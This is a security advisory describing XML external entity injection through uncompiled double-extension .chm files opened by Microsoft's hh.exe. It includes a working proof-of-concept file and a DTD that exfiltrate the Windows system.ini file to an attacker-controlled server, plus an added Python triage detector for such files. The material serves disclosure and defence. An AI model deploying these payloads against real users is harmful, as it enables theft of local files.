Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Compiled HTML Help "hh.exe"
Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is the extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
CHM files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass using this program and create them easily by simply adding a double .chm extension to the file, ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it, processing any JS/HTML/XML inside, etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks, allowing remote attackers to steal and exfiltrate local system files.
What's interesting about this one is that we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
While CHM is already considered a "dangerous" file type and other types of attack have already been documented, I thought this was an interesting way to create "uncompiled" CHM files, bypassing the default creation steps, while stealing local files in the process.
Note: User interaction is required to exploit this vulnerability.
[Exploit/POC]
1) python -m SimpleHTTPServer
2) "XXE.chm.chm"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>
3) "payload.dtd" (hosted in the Python web-server directory from step 1, port 8000)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;
Open the "XXE.chm.chm" file and it will exfiltrate the Windows "system.ini"; the attacker server IP is set to localhost on port 81 for the PoC.
Tested successfully on Windows 7/10.
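A defender-side triage check for this pattern, added here as an example and not part of the advisory or any Microsoft tooling: it tells a genuine compiled CHM (which begins with the ITSF magic bytes) from an uncompiled HTML/XML document delivered under a stacked .chm extension, and flags external entity declarations and parameter entity references of the kind the PoC above relies on. The sample bytes are constructed (a trimmed copy of the PoC and a minimal fake ITSF header); the function names and risk levels are assumptions of this example.

```python
# Added example (not part of the advisory): triage a file that arrives with a
# .chm extension and decide whether it is a genuine compiled CHM or an
# uncompiled HTML/XML document carrying external entity declarations.
import re
from pathlib import Path

# A genuine compiled CHM starts with the ITSF ("InfoTech Storage Format") magic.
CHM_MAGIC = b"ITSF"

# Extensions that, stacked under a final ".chm", suggest the double-extension trick.
STACKED_EXTENSIONS = {".chm", ".htm", ".html", ".xml"}

# <!ENTITY name SYSTEM ...> or <!ENTITY % name PUBLIC ...>: an external
# general or parameter entity declaration.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s*)?([\w.\-]+)\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
# %name; : a parameter entity reference, the mechanism used to pull in a remote DTD.
PARAM_ENTITY_REF_RE = re.compile(rb"%[\w.\-]+;")


def is_compiled_chm(data: bytes) -> bool:
    """True when the bytes carry the ITSF header a compiled CHM file has."""
    return data[:4] == CHM_MAGIC


def has_stacked_extension(filename: str) -> bool:
    """True for names such as "XXE.chm.chm" or "page.html.chm"."""
    suffixes = [s.lower() for s in Path(filename).suffixes]
    return (
        len(suffixes) >= 2
        and suffixes[-1] == ".chm"
        and suffixes[-2] in STACKED_EXTENSIONS
    )


def external_entity_names(data: bytes) -> list:
    """Names of every external entity declared in the document, in order of appearance."""
    return [m.group(1).decode("ascii", "replace") for m in EXTERNAL_ENTITY_RE.finditer(data)]


def assess(filename: str, data: bytes) -> dict:
    """Return a triage verdict: a risk level plus the individual findings behind it."""
    findings = []
    if has_stacked_extension(filename):
        findings.append("stacked extension ending in .chm")
    compiled = is_compiled_chm(data)
    if not compiled:
        findings.append("no ITSF header: not a compiled CHM, content is raw HTML/XML")
    names = external_entity_names(data)
    if names:
        findings.append("external entity declarations: " + ", ".join(names))
    if PARAM_ENTITY_REF_RE.search(data):
        findings.append("parameter entity reference (%name;)")

    if names:
        risk = "high"      # a file-read / exfiltration primitive is present
    elif not compiled:
        risk = "medium"    # uncompiled content: inspect before opening
    else:
        risk = "low"
    return {"file": filename, "compiled": compiled, "risk": risk, "findings": findings}


# Constructed samples: a trimmed copy of the advisory's PoC, and a minimal fake ITSF header.
POC_SAMPLE = b"""<HTML><BODY><xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\\Windows\\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml></BODY></HTML>"""
COMPILED_SAMPLE = b"ITSF" + b"\x03\x00\x00\x00" + b"\x00" * 56  # constructed header stub


if __name__ == "__main__":
    for name, blob in (("XXE.chm.chm", POC_SAMPLE), ("help.chm", COMPILED_SAMPLE)):
        verdict = assess(name, blob)
        print(f"{name}: risk={verdict['risk']}")
        for finding in verdict["findings"]:
            print("  -", finding)
```

The header check is the decisive signal: hh.exe is expected to receive ITSF-compressed data, so a ".chm" that is plain text is already suspect even before any DOCTYPE is found. The entity patterns are deliberately broad (they match inside comments and CDATA too), which is the right trade-off for a mail-gateway or download-scanner triage step where a false positive costs a manual look and a false negative costs a file read.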
[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx.